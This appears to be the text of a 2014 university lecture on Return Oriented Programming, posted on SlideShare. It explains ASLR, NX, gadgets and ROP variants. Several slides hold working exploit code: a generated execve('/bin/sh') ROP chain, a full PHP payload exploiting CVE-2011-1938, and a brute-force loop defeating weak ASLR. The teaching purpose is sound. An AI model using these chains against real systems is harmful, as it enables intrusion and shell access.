SlideShare ist ein Scribd-Unternehmen logo

Course lecture - An introduction to the Return Oriented Programming

‱
‱
Jonathan Salwan
Jonathan Salwan

This document provides an introduction and overview of Return Oriented Programming (ROP). It discusses classical stack overflow attacks and the mitigations put in place like Address Space Layout Randomization (ASLR) and No eXecute (NX) bit. It then introduces ROP as a technique to bypass these mitigations by chaining small snippets of existing code, called gadgets, to perform malicious tasks without injecting code. Several tools for finding gadgets are presented, and an example exploitation of the CVE-2011-1938 vulnerability is discussed to demonstrate ROP in practice. The document concludes with discussing mitigations against ROP and some related research topics.

Technologie
1 von 65
Downloaden Sie, um offline zu lesen
An introduction to the Return Oriented Programming Why and How Course lecture at the Bordeaux university for the CSI Master Jonathan Salwan Keywords: ROP Intel / ARM, Tools, ROP chain generation, gadgets' semantics, ASLR and NX internal, JOP, SOP, BROP, SROP, example with CVE-2011-1938
Road-map ● Classical attacks without any security – Stack overflow exploitation in 2009 ● Mitigation against these classical attacks – Address space layout randomization – Not eXecute Bit ● ROP introduction – What is the ROP? – Why use the ROP? – How can we find gadgets? – Tools which can help you ● Real example – CVE-2011-1938 exploitation ● Mitigation against ROP attacks ● ROP variants – JOP, SOP, BROP, SROP ● Some cool research subjects – The gadgets semantics – Rop chain generation ● Conclusion ● References 2014 - J.Salwan Course lecture on the ROP attack 2
Classical attacks without any security ● Find the bug ● Try to control the program counter register ● Store your shellcode somewhere in memory ● Set the program counter register to point on your shellcode – Shellcode executed → you win 2014 - J.Salwan Course lecture on the ROP attack 3
Classical attacks without any security ● Classical stack buffer overflow – Control the saved EIP – Overwrite the SEIP with an address pointing to your code 2014 - J.Salwan Course lecture on the ROP attack 4
Mitigation against these classical attacks ● Address Space Layout Randomization ● No eXecute bit ● There are other protections but we won't describe them in this lecture – ASCII Armor – FORTIFY_SOURCE – SSP 2014 - J.Salwan Course lecture on the ROP attack 5
Address Space Layout Randomization ● Map your Heap and Stack randomly – At each execution, your Heap and Stack will be mapped at different places – It's the same for shared libraries and VDSO ● So, now you cannot jump on an hardened address like in a classical attacks (slide 4) 2014 - J.Salwan Course lecture on the ROP attack 6
Address Space Layout Randomization - Example ● Two executions of the same binary : 009c0000-009e1000 rw-p 00000000 00:00 0 [heap] 7fff329f5000-7fff32a16000 rw-p 00000000 00:00 0 [stack] 7fff32bde000-7fff32bdf000 r-xp 00000000 00:00 0 [vdso] 01416000-01437000 rw-p 00000000 00:00 0 [heap] 7fff2fa70000-7fff2fa91000 rw-p 00000000 00:00 0 [stack] 7fff2fb1c000-7fff2fb1d000 r-xp 00000000 00:00 0 [vdso] 2014 - J.Salwan Course lecture on the ROP attack 7
Address Space Layout Randomization – Linux Internal ● Heap and Stack areas mapped at a pseudo-random place for each execution 2014 - J.Salwan Course lecture on the ROP attack 8
No eXecute bit ● NX bit is a CPU feature – On Intel CPU, it works only on x86_64 or with Physical Address Extension (PAE) enable ● Enabled, it raises an exception if the CPU tries to execute something that doesn't have the NX bit set ● The NX bit is located and setup in the Page Table Entry 2014 - J.Salwan Course lecture on the ROP attack 9
No eXecute bit – Paging Internals 2014 - J.Salwan Course lecture on the ROP attack 10
No eXecute bit – PTE Internal ● The last bit is the NX bit (exb) – 0 = disabled – 1 = enabled 2014 - J.Salwan Course lecture on the ROP attack 11
ROP Introduction ● When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC [1] - Buchanan, E.; Roemer, R.; Shacham, H.; Savage, S. (October 2008) ● Return-Oriented Programming: Exploits Without Code Injection [2] - Shacham, Hovav; Buchanan, Erik; Roemer, Ryan; Savage, Stefan. Retrieved 2009-08-12. 2014 - J.Salwan Course lecture on the ROP attack 12
ROP definition ● Chain gadgets to execute malicious code. ● A gadget is a suite of instructions which end by the branch instruction ret (Intel) or the equivalent on ARM. – Intel examples: ● pop eax ; ret ● xor ebx, ebx ; ret – ARM examples: ● pop {r4, pc} ● str r1, [r0] ; bx lr ● Objective: Use gadgets instead of classical shellcode 2014 - J.Salwan Course lecture on the ROP attack 13
A gadget can contain other gadgets ● Because x86 instructions aren't aligned, a gadget can contain another gadget. f7c7070000000f9545c3 → test edi, 0x7 ; setnz byte ptr [rbp-0x3d] ; c7070000000f9545c3 → mov dword ptr [rdi], 0xf000000 ; xchg ebp, eax ; ret ● Doesn't work on RISC architectures like ARM, MIPS, SPARC... 2014 - J.Salwan Course lecture on the ROP attack 14
Why use the ROP? ● Gadgets are mainly located on segments without ASLR and on pages marked as executables – It can bypass the ASLR – It can bypass the NX bit 2014 - J.Salwan Course lecture on the ROP attack 15
Road-map attack ● Find your gadgets ● Store your gadgets addresses on the stack – You must to overwrite the saved eip with the address of your first gadget 2014 - J.Salwan Course lecture on the ROP attack 16
CALL and RET semantics (Intel x86) ●CALL semantic ESP ← ESP – 4 [ESP] ← NEXT(EIP) ; sEIP EIP ← OPERANDE ●RET semantic TMP ← [ESP] ; get the sEIP ESP ← ESP + 4 ; Align stack pointer EIP ← TMP ; restore the sEIP 2014 - J.Salwan Course lecture on the ROP attack 17
Attack process on x86 ● Gadget1 is executed and returns ● Gadget2 is executed and returns ● Gadget3 is executed and returns ● And so on until all instructions that you want are executed ● So, the real execution is: pop eax xor edx, edx inc ecx 2014 - J.Salwan Course lecture on the ROP attack 18
Attack process on ARM ● This is exactly the same process but this time using this kind of gadgets: pop {r3, pc} mov r0, r3 ; pop {r4, r5, r6, pc} pop {r3, r4, r5, r6, r7, pc} ● On ARM it's possible to pop a value directly in the program counter register (pc) 2014 - J.Salwan Course lecture on the ROP attack 19
How can we find gadgets? ● Several ways to find gadgets – Old school method : objdump and grep ● Some gadgets will be not found: Objdump aligns instructions. – Make your own tool which scans an executable segment – Use an existing tool 2014 - J.Salwan Course lecture on the ROP attack 20
Tools which can help you ● Rp++ by Axel Souchet [3] ● Ropeme by Long Le Dinh [4] ● Ropc by patkt [5] ● Nrop by Aurelien wailly [6] ● ROPgadget by Jonathan Salwan [7] 2014 - J.Salwan Course lecture on the ROP attack 21
ROPgadget tool ● ROPgadget is : – A gadgets finder and “auto-roper” – Written in Python – Using Capstone engine – Support PE, ELF, Mach-O formats – Support x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures 2014 - J.Salwan Course lecture on the ROP attack 22
ROPgadget tool – Quick example ● Display available gadgets $ ./ROPgadget.py --binary ./test-suite-binaries/elf-Linux-x86-NDH-chall 0x08054487 : pop edi ; pop ebp ; ret 8 0x0806b178 : pop edi ; pop esi ; ret 0x08049fdb : pop edi ; ret [...] 0x0804e76b : xor eax, eax ; pop ebx ; ret 0x0806a14a : xor eax, eax ; pop edi ; ret 0x0804aae0 : xor eax, eax ; ret 0x080c8899 : xor ebx, edi ; call eax 0x080c85c6 : xor edi, ebx ; jmp dword ptr [edx] Unique gadgets found: 2447 2014 - J.Salwan Course lecture on the ROP attack 23
ROPgadget tool – ROP chain generation in 5 steps ● Objective : int execve(const char *filename, char *const argv[], char *const envp[]); ● Step 1 - Write-what-where gadgets – Write “/bin/sh” in memory ● Step 2 - Init syscall number gadgets – Setup execve syscall number ● Step 3 - Init syscall arguments gadgets – Setup execve arguments ● Step 4 - Syscall gadgets – Find syscall interrupt ● Step 5 - Build the ROP chain – Build the python payload 2014 - J.Salwan Course lecture on the ROP attack 24
Step 1 Write-what-where gadgets - Step 1 -- Write-what-where gadgets [+] Gadget found: 0x80798dd mov dword ptr [edx], eax ; ret [+] Gadget found: 0x8052bba pop edx ; ret [+] Gadget found: 0x80a4be6 pop eax ; ret [+] Gadget found: 0x804aae0 xor eax, eax ; ret ● The edx register is the destination ● The eax register is the content ● xor eax, eax is used to put the null byte at the end 2014 - J.Salwan Course lecture on the ROP attack 25
Step 2 Init syscall number gadgets - Step 2 -- Init syscall number gadgets [+] Gadget found: 0x804aae0 xor eax, eax ; ret [+] Gadget found: 0x8048ca6 inc eax ; ret ● xor eax, eax is used to initialize the context to zero ● inc eax is used 11 times to setup the exceve syscall number 2014 - J.Salwan Course lecture on the ROP attack 26
Step 3 Init syscall arguments gadgets - Step 3 -- Init syscall arguments gadgets [+] Gadget found: 0x8048144 pop ebx ; ret [+] Gadget found: 0x80c5dd2 pop ecx ; ret [+] Gadget found: 0x8052bba pop edx ; ret ● int execve(const char *filename, char *const argv[], char *const envp[]); – pop ebx is used to initialize the first argument – pop ecx is used to initialize the second argument – pop edx is used to initialize the third argument 2014 - J.Salwan Course lecture on the ROP attack 27
Step 4 Syscall gadget - Step 4 -- Syscall gadget [+] Gadget found: 0x8048ca8 int 0x80 ● int 0x80 is used to raise a syscall exception 2014 - J.Salwan Course lecture on the ROP attack 28
Step 5 - Build the ROP chain p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a0) # @ .data p += pack('<I', 0x080a4be6) # pop eax ; ret p += '/bin' p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a4) # @ .data + 4 p += pack('<I', 0x080a4be6) # pop eax ; ret p += '//sh' p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x0804aae0) # xor eax, eax ; ret p += pack('<I', 0x080798dd) # mov dword ptr [edx], eax ; ret p += pack('<I', 0x08048144) # pop ebx ; ret p += pack('<I', 0x080cd9a0) # @ .data p += pack('<I', 0x080c5dd2) # pop ecx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x08052bba) # pop edx ; ret p += pack('<I', 0x080cd9a8) # @ .data + 8 p += pack('<I', 0x0804aae0) # xor eax, eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca6) # inc eax ; ret p += pack('<I', 0x08048ca8) # int 0x80 2014 - J.Salwan Course lecture on the ROP attack 29
ROPgadget tool – ROP chain generation Demo time 2014 - J.Salwan Course lecture on the ROP attack 30
Real example with the CVE-2011-1938 <?php $addr = str_repeat("A", 500); $fd = socket_create(AF_UNIX, SOCK_STREAM, 1); $ret = socket_connect($fd, $addr); ?> ● Stack overflow in PHP 5.3.6 via the “addr” parameter – AF_UNIX must be setup to trigger the bug 2014 - J.Salwan Course lecture on the ROP attack 31
CVE-2011-1938 Analysis PHP_FUNCTION(socket_connect) { zval *arg1; php_socket *php_sock; struct sockaddr_in sin; #if HAVE_IPV6 struct sockaddr_in6 sin6; #endif struct sockaddr_un s_un; /* stack var */ char *addr; int retval, addr_len; long port = 0; int argc = ZEND_NUM_ARGS(); [...] case AF_UNIX: memset(&s_un, 0, sizeof(struct sockaddr_un)); s_un.sun_family = AF_UNIX; memcpy(&s_un.sun_path, addr, addr_len); /* Unlimited copy. Stack overflow */ retval = connect(php_sock->bsd_socket, (struct sockaddr *) &s_un, (socklen_t) XtOffsetOf(struct sockaddr_un, sun_path) + addr_len); break; [...] } 2014 - J.Salwan Course lecture on the ROP attack 32
CVE-2011-1938 exploitation ● Objective – execve("/bin/sh", args, env); ● Necessary memory/registers state – EAX ← 11 (sys_execve) – EBX ← "/bin/sh" (char *) – ECX ← arguments (char **) – EDX ← env (char **) 2014 - J.Salwan Course lecture on the ROP attack 33
CVE-2011-1938 Possible gadgets [G01] int $0x80 [G02] inc %eax; ret [G03] xor %eax,%eax; ret [G04] mov %eax,(%edx); ret [G05] pop %ebp; ret [G06] mov %ebp,%eax; pop %ebx; pop %esi; pop %edi; pop %ebp; ret [G07] pop %edi; pop %ebp; ret [G08] mov %edi,%edx; pop %esi; pop %edi; pop %ebp; ret [G09] pop %ebx; pop %esi; pop %edi; pop %ebp; ret [G10] xor %ecx,%ecx; pop %ebx; mov %ecx,%eax; pop %esi; pop %edi; pop %ebp; ret /! Be careful that your gadgets will not erase values already loaded. Example with the gadgets G10 and the EAX register. 2014 - J.Salwan Course lecture on the ROP attack 34
CVE-2011-1938 Possible gadgets ● [G01] int 0x80 – Raise an exception ● [G02] inc %eax ; ret – Setup EAX ← 11 (sys_excve) ● [G03] xor eax, eax ; ret – Setup EAX ← 0 ● [G04] mov %eax, (edx) ; ret – Write-what-where ● [G05 & G06] pop %ebp ; ret && mov %ebp, %eax ; ret – Used to control the EAX register in the gadget 04 [G04] ● [G07 & G08] pop %edi, 
 ; ret && mov %edi, %edx ; 
 ; ret – Used to the RDX register in the gadget 4 [G04] ● [G09] – Setup EBX ← First argument of the execve ● [G10] – Setup ECX ← Second argument of execve 2014 - J.Salwan Course lecture on the ROP attack 35
CVE-2011-1938 The payload – Define gadgets ● Define useful gadgets found in /usr/bin/php binary define('DUMMY', "x42x42x42x42");// padding define('DATA', "x20xbax74x08");// .data 0x46a0 0x874ba20 define('DATA4', "x24xbax74x08");// DATA + 4 define('DATA8', "x28xbax74x08");// DATA + 8 define('DATA12', "x3cxbax74x08");// DATA + 12 define('INT_80', "x27xb6x07x08");// 0x0807b627: int $0x80 define('INC_EAX', "x66x50x0fx08");// 0x080f5066: inc %eax | ret define('XOR_EAX', "x60xb4x09x08");// 0x0809b460: xor %eax,%eax | ret define('MOV_A_D', "x84x3ex12x08");// 0x08123e84: mov %eax,(%edx) | ret define('POP_EBP', "xc7x48x06x08");// 0x080648c7: pop %ebp | ret define('MOV_B_A', "x18x45x06x08");// 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi // pop %edi | pop %ebp | ret define('MOV_DI_DX', "x20x26x07x08");// 0x08072620: mov %edi,%edx | pop %esi | pop %edi // pop %ebp | ret define('POP_EDI', "x23x26x07x08");// 0x08072623: pop %edi | pop %ebp | ret define('POP_EBX', "x0fx4dx21x08");// 0x08214d0f: pop %ebx | pop %esi | pop %edi | // pop %ebp | ret define('XOR_ECX', "xe3x3bx1fx08");// 0x081f3be3: xor %ecx,%ecx|pop %ebx|mov %ecx,%eax // pop %esi|pop %edi|pop %ebp|ret 2014 - J.Salwan Course lecture on the ROP attack 36
CVE-2011-1938 The payload – Step 1 ● Store “//bi” in the memory POP_EDI. // pop %edi DATA. // 0x874ba20 DUMMY. // pop %ebp MOV_DI_DX. // mov %edi,%edx DUMMY. // pop %esi DUMMY. // pop %edi "//bi". // pop %ebp MOV_B_A. // mov %ebp,%eax DUMMY. // pop %ebx DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp MOV_A_D. // mov %eax,(%edx) 2014 - J.Salwan Course lecture on the ROP attack 37
CVE-2011-1938 The payload – Step 1 ● Store “n/sh” in the memory POP_EDI. // pop %edi DATA4. // 0x874ba24 DUMMY. // pop %ebp MOV_DI_DX. // mov %edi,%edx DUMMY. // pop %esi DUMMY. // pop %edi "n/sh". // pop %ebp MOV_B_A. // mov %ebp,%eax DUMMY. // pop %ebx DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp MOV_A_D. // mov %eax,(%edx) 2014 - J.Salwan Course lecture on the ROP attack 38
CVE-2011-1938 The payload – Step 1 ● Store “0” at the end. POP_EDI. // pop %edi DATA8. // 0x874ba28 DUMMY. // pop %ebp MOV_DI_DX. // mov %edi,%edx DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp XOR_EAX. // xor %eax,%eax MOV_A_D. // mov %eax,(%edx) 2014 - J.Salwan Course lecture on the ROP attack 39
CVE-2011-1938 The payload – Step 2 ● Setup arguments XOR_ECX. // xor %ecx,%ecx DUMMY. // pop %ebx DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp POP_EBX. // pop %ebx DATA. // 0x874ba20 DUMMY. // pop %esi DUMMY. // pop %edi DUMMY. // pop %ebp 2014 - J.Salwan Course lecture on the ROP attack 40
CVE-2011-1938 The payload – Step 3 ● Setup syscall number XOR_EAX. // xor %eax,%eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax INC_EAX. // inc %eax 2014 - J.Salwan Course lecture on the ROP attack 41
CVE-2011-1938 The payload – Step 4 ● Raise an exception INT_80; // int $0x80 ● Trigger the vulnerability $evil = $padd.$payload; $fd = socket_create(AF_UNIX, SOCK_STREAM, 1); $ret = socket_connect($fd, $evil); 2014 - J.Salwan Course lecture on the ROP attack 42
Mitigation against the ROP attack ● Linux - Position-Independent Executable – Applies the ASLR on the section .text ● Can be bypassed on old specific 32bits-based Linux distribution – PIC (Position-Independent Code) is used for library when a binary is compiled with PIE ● On Windows, ASLR can include the section .text 2014 - J.Salwan Course lecture on the ROP attack 43
ASLR – Entropy not enough on certain old distribution ● Tested on a ArchLinux 32 bits in 2011 – NX enable – ASLR enable – PIE enable – RELRO full ● If you don't have enough gadgets : – Choose yours in the libc – Brute-force the base address 2014 - J.Salwan Course lecture on the ROP attack 44
PIC/PIE – Entropy not enough on certain old distribution ● Brute-force the base address base_addr = 0xb770a000 p = "a" * 44 # execve /bin/sh generated by RopGadget v3.3 p += pack("<I", base_addr + 0x000e07c1) # pop %edx | pop %ecx | pop %ebx | ret p += pack("<I", 0x42424242) # padding p += pack("<I", base_addr + 0x00178020) # @ .data p += pack("<I", 0x42424242) # padding p += pack("<I", base_addr + 0x00025baf) # pop %eax | ret p += "/bin" [...] 2014 - J.Salwan Course lecture on the ROP attack 45
PIC/PIE – Entropy not enough on certain old distribution ● Wait for a few seconds [jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault [...] Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault sh-4.2$ 2014 - J.Salwan Course lecture on the ROP attack 46
ROP variants ● Jump Oriented Programming [8] ● String Oriented Programmng [9] ● Blind Return Oriented Programming [10] ● Signal Return Oriented Programming [11] 2014 - J.Salwan Course lecture on the ROP attack 47
Jump Oriented Programming ● Use the jump instruction instead of the ret one ● “The attack relies on a gadget dispatcher to dispatch and execute the functional gadgets” ● “The “program counter” is any register that points into the dispatch table” 2014 - J.Salwan Course lecture on the ROP attack 48
Jump Oriented Programming 2014 - J.Salwan Course lecture on the ROP attack 49
String Oriented Programmng ● SOP uses a format string bug to get the control flow. ● SOP uses two scenario to get the control of the application – Direct control flow redirect ● Erase the return address on the stack – Jump on a gadget which adjusts the stack frame to the attacker-controlled buffer ● If the buffer is on the stack → we can use the ROP ● If the buffer is on the heap → we cabn use the JOP – Indirect control flow redirect ● Erase a GOT entry – Jump on a gadget (ROP scenario) – Jump on a gadgets dispatcher (JOP scenario) 2014 - J.Salwan Course lecture on the ROP attack 50
Blind Return Oriented Programming ● BROP deals with the ROP and “timing attack” ● Constraints: – The vulnerability must be a stack buffer overflow – The target binary (server) must restart after the crash ● Scan the memory byte-by-byte to find potential gadgets – Try to execute the _write_ function/syscall to leak more gadget from the .text section 2014 - J.Salwan Course lecture on the ROP attack 51
Signal Return Oriented Programming ● Uses the SIGRETURN Linux signal to load values from the stack to the registers – Store the values on the stack then raise the SIGRETURN syscall ● Your registers will be initialized with the stack values 2014 - J.Salwan Course lecture on the ROP attack 52
Some cool research subjects ● ROP chain mitigation – Heuristic ROP detection ● ROP chain generation via theorem solver – Use a SAT/SMT solver to build a ROP chain ● Gadgets finding via instruction semantics – Looking for gadgets based on their semantics ● LOAD/STORE, GET/PUT 2014 - J.Salwan Course lecture on the ROP attack 53
Gadgets semantics 2014 - J.Salwan Course lecture on the ROP attack 54
Example of gadgets' semantics with the nrop tool (Aurelien's work) ● Nrop tool based on Qemu and LLVM ● Example of semantic with “mov rax, rbx ; ret” Qemu: nopn $0x2,$0x2 mov_i64 rax,rbx qemu_ld_i64 tmp0,rsp,leq,$0x0 movi_i64 tmp11,$0x8 add_i64 tmp3,rsp,tmp11 mov_i64 rsp,tmp3 st_i64 tmp0,env,$0x80 exit_tb $0x0 end LLVM: ; ModuleID = 'X' @rbx = external global i64 @rax = external global i64 @rsp = external global i64 @rip = external thread_local global i64 ; Function Attrs: nounwind define i64 @F0cktion(i64) #0 { entry: %Lgv = load i64* @rbx store i64 %Lgv, i64* @rax %Lgv1 = load i64* @rsp %Ildq = inttoptr i64 %Lgv1 to i64* %Ldq = load i64* %Ildq %Oarith = add i64 %Lgv1, 8 store i64 %Oarith, i64* @rsp store i64 %Ldq, i64* @rip ret i64 0 } 2014 - J.Salwan Course lecture on the ROP attack 55
Example of gadgets' semantics with the nrop tool (Aurelien's work) ● Gadgets finding via instruction semantics % ./nrop -t 4889d8c3 examples/opti | grep "equivalent! 3" -A2 -- Found equivalent! 3 [X] xchg rbx, rax ; ret ; [X] mov rax, rbx ; ret ; -- Found equivalent! 3 [X] xchg rcx, rbx ; lea rax, ptr [rcx] ; ret ; [X] mov rax, rbx ; ret ; [
] % ./nrop -t 48c7c034120000c3 examples/opti | grep "equivalent! 3" -A2 Found equivalent! 3 [X] push 0x1234 ; pop rax ; inc rbx ; ret ; [X] mov rax, 0x1234 ; ret ; -- Found equivalent! 3 [X] push 0x1234 ; pop rbp ; xchg rbp, rax ; ret ; [X] mov rax, 0x1234 ; ret ; -- Found equivalent! 3 [X] push 0xffffffffffffedcc ; pop rdx ; xor rax, rax ; sub rax, rdx ; ret ; [X] mov rax, 0x1234 ; ret ; 2014 - J.Salwan Course lecture on the ROP attack 56
Example of gadgets' semantics (Axel's work) ● Axel Souchet works on a similar approach ; here how it works – Use a virtual CPU and symbolic variables – Setup some constraints on this virtual CPU – Execute symbolically the gadgets – Then compare the result using a theorem solver (z3) 2014 - J.Salwan Course lecture on the ROP attack 57
Example of gadgets' semantics (Axel's work) ● Example with several constraints: "I want EAX = EBX = 0 at the end of the gadget execution": PS D:Codes> python.exe look_for_gadgets_with_equations.py xor eax, eax ; push eax ; mov ebx, eax ; ret xor eax, eax ; xor ebx, ebx ; ret [...] ● Find a way to pivot code execution to the stack: "I want EIP = ESP at the end of the gadget execution": PS D:Codes> python.exe look_for_gadgets_with_equations2.py add dword ptr [ebx], 2 ; push esp ; ret jmp esp pushal ; mov eax, 0xffffffff ; pop ebx ; pop esi ; pop edi ; ret [...] 2014 - J.Salwan Course lecture on the ROP attack 58
ROPchain generation via state machine and backtracking 2014 - J.Salwan Course lecture on the ROP attack 59
ROP chain generation via theorem solver ● Use a SAT/SMT solver to generate a ROP chain is not so trivial. – /! We must keep an execution order – Better/harder if we generate the optimal solution – Better/harder if we would like to generate a ROP chain quickly 2014 - J.Salwan Course lecture on the ROP attack 60
ROP chain generation using backtracking and state-machine [12] ● It's possible to generate a ROP chain using only the backtracking technique and a state machine (1) Initialize a current context ● It's basically the states register from the crash point (2) Initialize a targeted context (3) Backtrack and apply the gadgets semantics (4) Stop when the current context is equal to the targeted context 2014 - J.Salwan Course lecture on the ROP attack 61
ROP chain generation using backtracking and state-machine - Examples of gadgets semantics This is a dumb example of semantics but enough for a PoC. If you plan to make a reliable version, you have to describe the flags and memory effects. 2014 - J.Salwan Course lecture on the ROP attack 62
ROP chain generation using backtracking and state-machine Demo time 2014 - J.Salwan Course lecture on the ROP attack 63
Conclusion ● The ROP is now a current operation and it's actively used by every attackers ● There is yet a lot of research around this attack like: – ROP mitigation (heuristic, etc...) – ROP chain generation – Smart gadgets finding – Etc... 2014 - J.Salwan Course lecture on the ROP attack 64
References ● [1] http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html ● [2] http://cseweb.ucsd.edu/~hovav/dist/sparc.pdf ● [3] https://github.com/0vercl0k/rp ● [4] http://ropshell.com/ropeme/ ● [5] https://github.com/pakt/ropc ● [6] https://github.com/awailly/nrop ● [7] http://shell-storm.org/project/ROPgadget/ ● [8] https://www.comp.nus.edu.sg/~liangzk/papers/asiaccs11.pdf ● [9] https://www.lst.inf.ethz.ch/research/publications/PPREW_2013/PPREW_2013.pdf ● [10] http://www.scs.stanford.edu/brop/bittau-brop.pdf ● [11] https://labs.portcullis.co.uk/blog/ohm-2013-review-of-returning-signals-for-fun-and-profit/ ● [12] http://shell-storm.org/repo/Notepad/ROP-chain-generation-via-backtracking-and-state-machine.txt 2014 - J.Salwan Course lecture on the ROP attack 65

Empfohlen

Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)
Pipat Methavanitpong
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
Saumil Shah
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
n|u - The Open Security Community
 
Return oriented programming
Return oriented programmingReturn oriented programming
Return oriented programming
hybr1s
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
Saumil Shah
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROP
Saumil Shah
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
n|u - The Open Security Community
 

Empfohlen

Return oriented programming (ROP)
Return oriented programming (ROP)Return oriented programming (ROP)
Return oriented programming (ROP)
Pipat Methavanitpong
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
Saumil Shah
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
n|u - The Open Security Community
 
Return oriented programming
Return oriented programmingReturn oriented programming
Return oriented programming
hybr1s
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
Saumil Shah
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROP
Saumil Shah
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
n|u - The Open Security Community
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
Saumil Shah
 
Virtual platform
Virtual platformVirtual platform
Virtual platform
sean chen
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
Saumil Shah
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
ROP èŒ•éŹ†è«‡
ROP èŒ•éŹ†è«‡ROP èŒ•éŹ†è«‡
ROP èŒ•éŹ†è«‡
hackstuff
 
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMHandling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
Min-Yih Hsu
 
Exploit techniques and mitigation
Exploit techniques and mitigationExploit techniques and mitigation
Exploit techniques and mitigation
Yaniv Shani
 
Processor Verification Using Open Source Tools and the GCC Regression Test Suite
Processor Verification Using Open Source Tools and the GCC Regression Test SuiteProcessor Verification Using Open Source Tools and the GCC Regression Test Suite
Processor Verification Using Open Source Tools and the GCC Regression Test Suite
DVClub
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
Quinn Wilton
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
 
fg.workshop: Software vulnerability
fg.workshop: Software vulnerabilityfg.workshop: Software vulnerability
fg.workshop: Software vulnerability
fg.informatik UniversitÀt Basel
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
Alexandre Moneger
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
RootedCON
 
2021.laravelconf.tw.slides2
2021.laravelconf.tw.slides22021.laravelconf.tw.slides2
2021.laravelconf.tw.slides2
LiviaLiaoFontech
 
Verilator: Fast, Free, But for Me?
Verilator: Fast, Free, But for Me? Verilator: Fast, Free, But for Me?
Verilator: Fast, Free, But for Me?
DVClub
 
Triton and symbolic execution on gdb
Triton and symbolic execution on gdbTriton and symbolic execution on gdb
Triton and symbolic execution on gdb
Wei-Bo Chen
 
Triton and Symbolic execution on GDB@DEF CON China
